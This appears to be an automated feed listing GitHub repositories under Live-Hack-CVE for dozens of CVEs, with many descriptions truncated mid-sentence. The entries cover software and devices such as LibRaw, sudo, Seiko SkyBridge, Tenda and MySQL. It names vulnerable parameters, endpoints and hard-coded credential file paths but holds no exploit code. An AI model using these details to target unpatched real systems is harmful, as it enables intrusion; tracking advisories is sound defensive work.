**In LibRaw, there is an out-of-bounds read vulnerability within the "LibRaw::parseSonySRF()" function (libraw\src\metadata\sony.cpp) when processing srf files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35535](https://github.com/Live-Hack-CVE/CVE-2020-35535) create time: 2022-12-29T22:21:55Z

**In LibRaw, there is a memory corruption vulnerability within the "crxFreeSubbandData()" function (libraw\src\decoders\crx.cpp) when processing cr3 files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35534](https://github.com/Live-Hack-CVE/CVE-2020-35534) create time: 2022-12-29T22:21:41Z

**In SQlite 3.31.1, a potential null pointer derreference was found in the INTERSEC query processing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35525](https://github.com/Live-Hack-CVE/CVE-2020-35525) create time: 2022-12-29T22:21:20Z

**The version of podman as released for Red Hat Enterprise Linux 7 Extras via RHSA-2022:2190 advisory included an incorrect version of podman missing the fix for CVE-2020-14370, which was previously fixed via RHSA-2020:5056. This issue could possibly allow an attacker to gain access to sensitive information stored in env CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2739](https://github.com/Live-Hack-CVE/CVE-2022-2739) create time: 2022-12-29T22:20:52Z

**In oauth2-server (aka node-oauth2-server) through 3.1.1, the value of the redirect_uri parameter received during the authorization and token request is checked against an incorrect URI pattern ("[a-zA-Z][a-zA-Z0-9+.-]+:") before making a redirection. This allows a malicious client to pass an XSS payload through the red CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26938](https://github.com/Live-Hack-CVE/CVE-2020-26938) create time: 2022-12-29T22:20:06Z

**Dell Command | Update, Dell Update, and Alienware Update versions before 4.3 contains an Improper Verification of Cryptographic Signature Vulnerability. A local authenticated malicious user may exploit this vulnerability by executing arbitrary code on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36277](https://github.com/Live-Hack-CVE/CVE-2021-36277) create time: 2022-12-29T23:10:19Z

**IBM Engineering Test Management 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210671. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38934](https://github.com/Live-Hack-CVE/CVE-2021-38934) create time: 2022-12-29T23:10:15Z

**IBM Security Identity Manager 6.0 and 6.0.2 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site tha CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29864](https://github.com/Live-Hack-CVE/CVE-2021-29864) create time: 2022-12-29T23:09:10Z

**A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 10.1.4.37651. A specially crafted PDF document can trigger the reuse of previously free memory, which can lead to arbitrary code execution. An attacker needs to trick the user into opening a malicious file or site to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21870](https://github.com/Live-Hack-CVE/CVE-2021-21870) create time: 2022-12-29T23:06:23Z

**A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 11.0.0.49893. A specially crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21893](https://github.com/Live-Hack-CVE/CVE-2021-21893) create time: 2022-12-29T23:06:20Z

**A unsafe deserialization vulnerability exists in the PackageManagement.plugin ExtensionMethods.Clone() functionality of CODESYS GmbH CODESYS Development System 3.5.16. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21865](https://github.com/Live-Hack-CVE/CVE-2021-21865) create time: 2022-12-29T23:06:16Z

**When parsing a file that is submitted to the DPDecoder service as a job, the R3D SDK will mistakenly skip over the assignment of a property containing an object referring to a UUID that was parsed from a frame within the video container. Upon destruction of the object that owns it, the uninitialized member will be dere CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40418](https://github.com/Live-Hack-CVE/CVE-2021-40418) create time: 2022-12-29T23:05:48Z

**The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notabl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42392](https://github.com/Live-Hack-CVE/CVE-2021-42392) create time: 2022-12-29T23:05:44Z

**Server side request forgery protections in GitLab CE/EE versions between 8.4 and 14.4.4, between 14.5.0 and 14.5.2, and between 14.6.0 and 14.6.1 would fail to protect against attacks sending requests to localhost on port 80 or 443 if GitLab was configured to run on a port other than 80 or 443 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39927](https://github.com/Live-Hack-CVE/CVE-2021-39927) create time: 2022-12-29T23:05:40Z

**A denial of service vulnerability exists in the cgiserver.cgi session creation functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to prevent users from logging in. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40406](https://github.com/Live-Hack-CVE/CVE-2021-40406) create time: 2022-12-29T23:05:37Z

**When parsing a file that is submitted to the DPDecoder service as a job, the service will use the combination of decoding parameters that were submitted with the job along with fields that were parsed for the submitted video by the R3D SDK to calculate the size of a heap buffer. Due to an integer overflow with regards CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40417](https://github.com/Live-Hack-CVE/CVE-2021-40417) create time: 2022-12-29T23:05:33Z

**An authentication bypass vulnerability exists in the get_aes_key_info_by_packetid() function of the home_security binary of Anker Eufy Homebase 2 2.1.6.9h. Generic network sniffing can lead to password recovery. An attacker can sniff network traffic to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21955](https://github.com/Live-Hack-CVE/CVE-2021-21955) create time: 2022-12-29T23:05:30Z

**ModSecurity 3.x through 3.0.5 mishandles excessively nested JSON objects. Crafted JSON objects with nesting tens-of-thousands deep could result in the web server being unable to service legitimate requests. Even a moderately large (e.g., 300KB) HTTP request can occupy one of the limited NGINX worker processes for minut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42717](https://github.com/Live-Hack-CVE/CVE-2021-42717) create time: 2022-12-29T23:05:26Z

**A flaw was found in Keycloak in versions from 12.0.0 and before 15.1.1 which allows an attacker with any existing user account to create new default user accounts via the administrative REST API even when new user registration is disabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4133](https://github.com/Live-Hack-CVE/CVE-2021-4133) create time: 2022-12-29T23:05:23Z

**An exploitable integer truncation vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. A specially crafted MPEG-4 input can cause an improper memory allocation resulting in a heap-based buffer overflow that causes memory corruption. The FOURCC code, 'trik CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21860](https://github.com/Live-Hack-CVE/CVE-2021-21860) create time: 2022-12-29T23:05:12Z

**An exploitable integer truncation vulnerability exists within the MPEG-4 decoding functionality of the GPAC Project on Advanced Content library v1.0.1. The stri_box_read function is used when processing atoms using the 'stri' FOURCC code. An attacker can convince a user to open a video to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21859](https://github.com/Live-Hack-CVE/CVE-2021-21859) create time: 2022-12-29T23:05:09Z

**A shell command injection in the HW Events SNMP community in XoruX LPAR2RRD and STOR2RRD before 7.30 allows authenticated remote attackers to execute arbitrary shell commands as the user running the service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42372](https://github.com/Live-Hack-CVE/CVE-2021-42372) create time: 2022-12-29T23:05:06Z

**lpar2rrd is a hardcoded system account in XoruX LPAR2RRD and STOR2RRD before 7.30. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42371](https://github.com/Live-Hack-CVE/CVE-2021-42371) create time: 2022-12-29T23:05:02Z

**Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3156](https://github.com/Live-Hack-CVE/CVE-2021-3156) create time: 2022-12-29T23:04:53Z

**A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27807](https://github.com/Live-Hack-CVE/CVE-2021-27807) create time: 2022-12-29T23:04:50Z

**A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27906](https://github.com/Live-Hack-CVE/CVE-2021-27906) create time: 2022-12-29T23:04:46Z

**There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3520](https://github.com/Live-Hack-CVE/CVE-2021-3520) create time: 2022-12-29T23:04:43Z

**A CWE-522: Insufficiently Protected Credentials vulnerability exists that could cause Sensitive data such as login credentials being exposed when a Network is sniffed. Affected Product: Conext? ComBox (All Versions) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22798](https://github.com/Live-Hack-CVE/CVE-2021-22798) create time: 2022-12-29T23:03:47Z

**In OPC Foundation Local Discovery Server (LDS) before 1.04.402.463, remote attackers can cause a denial of service (DoS) by sending carefully crafted messages that lead to Access of a Memory Location After the End of a Buffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40142](https://github.com/Live-Hack-CVE/CVE-2021-40142) create time: 2022-12-29T23:03:33Z

**MariaDB before 10.6.5 has a sql_lex.cc integer overflow, leading to an application crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46667](https://github.com/Live-Hack-CVE/CVE-2021-46667) create time: 2022-12-29T23:03:08Z

**The OPC autogenerated ANSI C stack stubs (in the NodeSets) do not handle all error cases. This can lead to a NULL pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45117](https://github.com/Live-Hack-CVE/CVE-2021-45117) create time: 2022-12-29T23:02:27Z

**PingID Desktop prior to 1.7.3 has a misconfiguration in the encryption libraries which can lead to sensitive data exposure. An attacker capable of exploiting this vulnerability may be able to successfully complete an MFA challenge via OTP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42001](https://github.com/Live-Hack-CVE/CVE-2021-42001) create time: 2022-12-29T23:02:23Z

**A misconfiguration of RSA in PingID Windows Login prior to 2.7 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41992](https://github.com/Live-Hack-CVE/CVE-2021-41992) create time: 2022-12-29T23:02:19Z

**A buffer overflow vulnerability in the TCP/IP stack of Juniper Networks Junos OS allows an attacker to send specific sequences of packets to the device thereby causing a Denial of Service (DoS). By repeatedly sending these sequences of packets to the device, an attacker can sustain the Denial of Service (DoS) condition CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0283](https://github.com/Live-Hack-CVE/CVE-2021-0283) create time: 2022-12-29T23:02:05Z

**A buffer overflow vulnerability in the TCP/IP stack of Juniper Networks Junos OS allows an attacker to send specific sequences of packets to the device thereby causing a Denial of Service (DoS). By repeatedly sending these sequences of packets to the device, an attacker can sustain the Denial of Service (DoS) condition CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0284](https://github.com/Live-Hack-CVE/CVE-2021-0284) create time: 2022-12-29T23:02:01Z

**An issue was discovered in Blue Prism Enterprise 6.0 through 7.01. In a misconfigured environment that exposes the Blue Prism Application server, it is possible for an authenticated user to reverse engineer the Blue Prism software and circumvent access controls for the setValidationInfo administrative function. Removin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36116](https://github.com/Live-Hack-CVE/CVE-2022-36116) create time: 2022-12-29T23:10:26Z

**An issue was discovered in Blue Prism Enterprise 6.0 through 7.01. In a misconfigured environment that exposes the Blue Prism Application server, it is possible for an authenticated user to reverse engineer the Blue Prism software and circumvent access controls for unintended functionality. An attacker can abuse the Cr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36115](https://github.com/Live-Hack-CVE/CVE-2022-36115) create time: 2022-12-29T23:10:23Z

**Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 8.9.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3072](https://github.com/Live-Hack-CVE/CVE-2022-3072) create time: 2022-12-29T23:10:12Z

**Seiko SkyBridge MB-A200 v01.00.04 and below was discovered to contain multiple hard-coded passcodes for root. Attackers are able to access the passcodes at /etc/srapi/config/system.conf and /usr/sbin/ssol-sshd.sh. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36560](https://github.com/Live-Hack-CVE/CVE-2022-36560) create time: 2022-12-29T23:10:08Z

**Seiko SkyBridge MB-A200 v01.00.04 and below was discovered to contain a command injection vulnerability via the Ping parameter at ping_exec.cgi. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36559](https://github.com/Live-Hack-CVE/CVE-2022-36559) create time: 2022-12-29T23:10:05Z

**Seiko SkyBridge MB-A100/A110 v4.2.0 and below implements a hard-coded passcode for the root account. Attackers are able to access the passcord via the file /etc/ciel.cfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36558](https://github.com/Live-Hack-CVE/CVE-2022-36558) create time: 2022-12-29T23:10:01Z

**Seiko SkyBridge MB-A100/A110 v4.2.0 and below was discovered to contain a command injection vulnerability via the ipAddress parameter at 07system08execute_ping_01. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36556](https://github.com/Live-Hack-CVE/CVE-2022-36556) create time: 2022-12-29T23:09:57Z

**Seiko SkyBridge MB-A100/A110 v4.2.0 and below was discovered to contain an arbitrary file upload vulnerability via the restore backup function. This vulnerability allows attackers to execute arbitrary code via a crafted html file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36557](https://github.com/Live-Hack-CVE/CVE-2022-36557) create time: 2022-12-29T23:09:31Z

**Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36553](https://github.com/Live-Hack-CVE/CVE-2022-36553) create time: 2022-12-29T23:09:28Z

**A use-after-free flaw was found in the Linux kernel’s PLP Rose functionality in the way a user triggers a race condition by calling bind while simultaneously triggering the rose_bind() function. This flaw allows a local user to crash or potentially escalate their privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2961](https://github.com/Live-Hack-CVE/CVE-2022-2961) create time: 2022-12-29T23:09:25Z

**A use-after-free flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1204](https://github.com/Live-Hack-CVE/CVE-2022-1204) create time: 2022-12-29T23:09:21Z

**Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, and OpUtils before 125658, 126003, 126105, and 126120 allow authenticated users to make database changes that lead to remote code execution in the NMAP feature. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38772](https://github.com/Live-Hack-CVE/CVE-2022-38772) create time: 2022-12-29T23:09:17Z

**Dell Container Storage Modules 1.2 contains an OS command injection in goiscsi and gobrick libraries. A remote authenticated malicious user with low privileges could exploit this vulnerability leading to to execute arbitrary OS commands on the affected system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34374](https://github.com/Live-Hack-CVE/CVE-2022-34374) create time: 2022-12-29T23:09:14Z

**Realtek Linux/Android Bluetooth Mesh SDK has a buffer overflow vulnerability due to insufficient validation for segmented packets’ link parameter. An unauthenticated attacker in the adjacent network can exploit this vulnerability to cause buffer overflow and disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26529](https://github.com/Live-Hack-CVE/CVE-2022-26529) create time: 2022-12-29T23:09:07Z

**Realtek Linux/Android Bluetooth Mesh SDK has a buffer overflow vulnerability due to insufficient validation for the length of segmented packets’ shift parameter. An unauthenticated attacker in the adjacent network can exploit this vulnerability to cause buffer overflow and disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26528](https://github.com/Live-Hack-CVE/CVE-2022-26528) create time: 2022-12-29T23:09:03Z

**Realtek Linux/Android Bluetooth Mesh SDK has a buffer overflow vulnerability due to insufficient validation for the size of segmented packets’ reference parameter. An unauthenticated attacker in the adjacent network can exploit this vulnerability to cause buffer overflow and disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26527](https://github.com/Live-Hack-CVE/CVE-2022-26527) create time: 2022-12-29T23:09:00Z

**Nortek Linear eMerge E3-Series 0.32-07p devices are vulnerable to /card_scan.php?CardFormatNo= XSS with session fixation (via PHPSESSID) when they are chained together. This would allow an attacker to take over an admin account or a user account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31798](https://github.com/Live-Hack-CVE/CVE-2022-31798) create time: 2022-12-29T23:08:56Z

**Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31499](https://github.com/Live-Hack-CVE/CVE-2022-31499) create time: 2022-12-29T23:08:53Z

**Nortek Linear eMerge E3-Series devices through 0.32-09c place admin credentials in /test.txt that allow an attacker to open a building's doors. (This occurs in situations where the CVE-2019-7271 default credentials have been changed.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31269](https://github.com/Live-Hack-CVE/CVE-2022-31269) create time: 2022-12-29T23:08:49Z

**In FiberHome VDSL2 Modem HG150-Ub_V3.0, Credentials of Admin are submitted in URL, which can be logged/sniffed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36200](https://github.com/Live-Hack-CVE/CVE-2022-36200) create time: 2022-12-29T23:08:46Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/view_schedule.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36674](https://github.com/Live-Hack-CVE/CVE-2022-36674) create time: 2022-12-29T23:08:42Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/manage_schedule.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36675](https://github.com/Live-Hack-CVE/CVE-2022-36675) create time: 2022-12-29T23:08:39Z

**Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36676](https://github.com/Live-Hack-CVE/CVE-2022-36676) create time: 2022-12-29T23:08:35Z

**** DISPUTED ** Patlite NH-FB v1.46 and below was discovered to contain insufficient firmware validation during the upgrade firmware file upload process. This vulnerability allows authenticated attackers to create and upload their own custom-built firmware and inject malicious code. NOTE: the vendor's position is that t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38625](https://github.com/Live-Hack-CVE/CVE-2022-38625) create time: 2022-12-29T23:08:32Z

**Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) in CallRail, Inc. CallRail Phone Call Tracking plugin <= 0.4.9 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36796](https://github.com/Live-Hack-CVE/CVE-2022-36796) create time: 2022-12-29T23:08:29Z

**Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Simon Ward MP3 jPlayer plugin <= 2.7.3 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36373](https://github.com/Live-Hack-CVE/CVE-2022-36373) create time: 2022-12-29T23:08:25Z

**Authenticated (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in PluginlySpeaking Easy Org Chart plugin <= 3.1 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36355](https://github.com/Live-Hack-CVE/CVE-2022-36355) create time: 2022-12-29T23:08:21Z

**Measuresoft ScadaPro Server and Client (All Versions) do not properly resolve links before file access; this could allow privilege escalation.. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2897](https://github.com/Live-Hack-CVE/CVE-2022-2897) create time: 2022-12-29T23:08:14Z

**Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the list parameter at /goform/setPptpUserList. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36568](https://github.com/Live-Hack-CVE/CVE-2022-36568) create time: 2022-12-29T23:08:11Z

**In D-Link DIR-816 A2_v1.10CNB04.img a command injection vulnerability occurs in /goform/Diagnosis, after the condition is met, setnum will be spliced into v10 by snprintf, and the system will be executed, resulting in a command injection vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37130](https://github.com/Live-Hack-CVE/CVE-2022-37130) create time: 2022-12-29T23:08:07Z

**Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4866](https://github.com/Live-Hack-CVE/CVE-2015-4866) create time: 2022-12-29T21:43:18Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2015-4913. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4858](https://github.com/Live-Hack-CVE/CVE-2015-4858) create time: 2022-12-29T21:43:14Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4830](https://github.com/Live-Hack-CVE/CVE-2015-4830) create time: 2022-12-29T21:43:11Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4870](https://github.com/Live-Hack-CVE/CVE-2015-4870) create time: 2022-12-29T21:43:07Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4815](https://github.com/Live-Hack-CVE/CVE-2015-4815) create time: 2022-12-29T21:42:42Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4816](https://github.com/Live-Hack-CVE/CVE-2015-4816) create time: 2022-12-29T21:42:39Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4826](https://github.com/Live-Hack-CVE/CVE-2015-4826) create time: 2022-12-29T21:42:35Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect availability via vectors related to DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2648](https://github.com/Live-Hack-CVE/CVE-2015-2648) create time: 2022-12-29T21:42:29Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2643](https://github.com/Live-Hack-CVE/CVE-2015-2643) create time: 2022-12-29T21:42:25Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect availability via vectors related to Server : I_S. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4752](https://github.com/Live-Hack-CVE/CVE-2015-4752) create time: 2022-12-29T21:42:15Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2571](https://github.com/Live-Hack-CVE/CVE-2015-2571) create time: 2022-12-29T21:42:11Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.41 and earlier, and 5.6.22 and earlier, allows remote authenticated users to affect availability via vectors related to DDL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2573](https://github.com/Live-Hack-CVE/CVE-2015-2573) create time: 2022-12-29T21:42:04Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect availability via vectors related to GIS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2582](https://github.com/Live-Hack-CVE/CVE-2015-2582) create time: 2022-12-29T21:42:00Z

**Unspecified vulnerability in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0502](https://github.com/Live-Hack-CVE/CVE-2016-0502) create time: 2022-12-29T21:42:53Z

**Modsecurity owasp-modsecurity-crs 3.2.0 (Paranoia level at PL1) has a SQL injection bypass vulnerability. Attackers can use the comment characters and variable assignments in the SQL syntax to bypass Modsecurity WAF protection and implement SQL injection attacks on Web applications. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22669](https://github.com/Live-Hack-CVE/CVE-2020-22669) create time: 2022-12-29T22:17:31Z

**An access control issue in Canaan Avalon ASIC Miner 2020.3.30 and below allows unauthenticated attackers to arbitrarily change user passwords via a crafted POST request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36604](https://github.com/Live-Hack-CVE/CVE-2022-36604) create time: 2022-12-29T21:44:35Z

**Mikrotik RouterOs before stable 6.47 suffers from an uncontrolled resource consumption in the sshd process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20230](https://github.com/Live-Hack-CVE/CVE-2020-20230) create time: 2022-12-29T21:41:30Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36189](https://github.com/Live-Hack-CVE/CVE-2020-36189) create time: 2022-12-29T21:41:22Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35491](https://github.com/Live-Hack-CVE/CVE-2020-35491) create time: 2022-12-29T21:41:19Z

**FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35490](https://github.com/Live-Hack-CVE/CVE-2020-35490) create time: 2022-12-29T21:41:15Z

**Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6917](https://github.com/Live-Hack-CVE/CVE-2020-6917) create time: 2022-12-29T21:41:12Z

**Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6922](https://github.com/Live-Hack-CVE/CVE-2020-6922) create time: 2022-12-29T21:41:08Z

**Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6921](https://github.com/Live-Hack-CVE/CVE-2020-6921) create time: 2022-12-29T21:41:04Z

**Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6920](https://github.com/Live-Hack-CVE/CVE-2020-6920) create time: 2022-12-29T21:40:49Z

**Potential security vulnerabilities including compromise of integrity, and allowed communication with untrusted clients has been identified in HP Support Assistant software. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6919](https://github.com/Live-Hack-CVE/CVE-2020-6919) create time: 2022-12-29T21:40:45Z

